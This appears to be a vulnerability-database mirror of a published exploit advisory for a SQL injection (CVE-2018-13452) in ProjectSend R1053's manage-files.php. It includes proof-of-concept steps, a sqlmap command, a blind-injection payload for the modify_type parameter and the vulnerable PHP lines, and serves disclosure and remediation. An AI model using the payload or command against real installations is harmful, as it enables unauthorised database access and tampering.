Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ProjectSend - SQL Injection Vulnerability

🗓️ 29 Jul 2018 00:00:00Reported by GUIA Brahim FouadType 
zdt
 zdt🔗 0day.today👁 85 Views

SQL Injection in ProjectSend R105

Related
Code
ReporterTitlePublishedViews
Family
Packet Storm		ProjectSend R1053 SQL Injection
28 Jul 201800:00
packetstorm
# Exploit Title: ProjectSend - SQL Injection
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: https://www.projectsend.org/
# Software Link: https://www.projectsend.org/download/241/
# Version: R1053
# Tested on: ProjectSend version: R1053, php version: 7.0, MySQL version: 5.7
# CVE : CVE-2018-13452

POC : 

1 - must be logged in 
2 - need to upload file and get id of this file
3 - add relation to this file ( assigned to user )

http://localhost/ProjectSend/manage-files.php?modify_type=<sqli>&action=show&batch[]=<id file>&modify_id=<id file>

sqlmap.py -u "http://localhost/ProjectSend/manage-files.php?modify_type=4&action=show&batch[]=4&modify_id=4" --cookie="PHPSESSID=9jvcf5n4td8kvia6orjkp89mmt;" 

---
Parameter: modify_type (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: modify_type=(SELECT (CASE WHEN (1907=1907) THEN 1907 ELSE 1907*(SELECT 1907 FROM INFORMATION_SCHEMA.PLUGINS) END))&action=show&batch[]=4&modify_id=4
---


Description of the problem :
SQL Injection (unquoted)

File : manage-files.php

The GET parameter 'modify_type' is received in line 134 of the file manage-files.php.

Line| Code
132 | foreach ($selected_files as $work_file) {
133 | $this_file = new FilesActions();
134 | $this_file->change_files_hide_status('1', $work_file, $_GET['modify_type'], $_GET['modify_id']);

The user-supplied data is concatenated into sql markup in line 180 of the file includes/classes/actions-files.php in the function change_files_hide_status().

The user-supplied data is then used unsanitized in the sensitive operation prepare() in line 181 of the file includes/classes/actions-files.php in the method FilesActions::change_files_hide_status().

File : includes/classes/actions-files.php

Line| Code
174 | class FilesActions{function change_files_hide_status($change_to, $file_id, $modify_type, $modify_id){
180 | $this->sql = "UPDATE " . TABLE_FILES_RELATIONS . " SET hidden=:hidden WHERE file_id = :file_id AND " . $modify_type . " = :modify_id";
181 | $this->dbh->prepare($this->sql);

Environment
ProjectSend version: R1053
php version: 7.0
MySQL version: 5.7

#  0day.today [2018-07-30]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jul 2018 00:00Current
0.3Low risk
Vulners AI Score0.3
projectsendsql injectionfile uploaduser datavulnerabilityphpmysql
85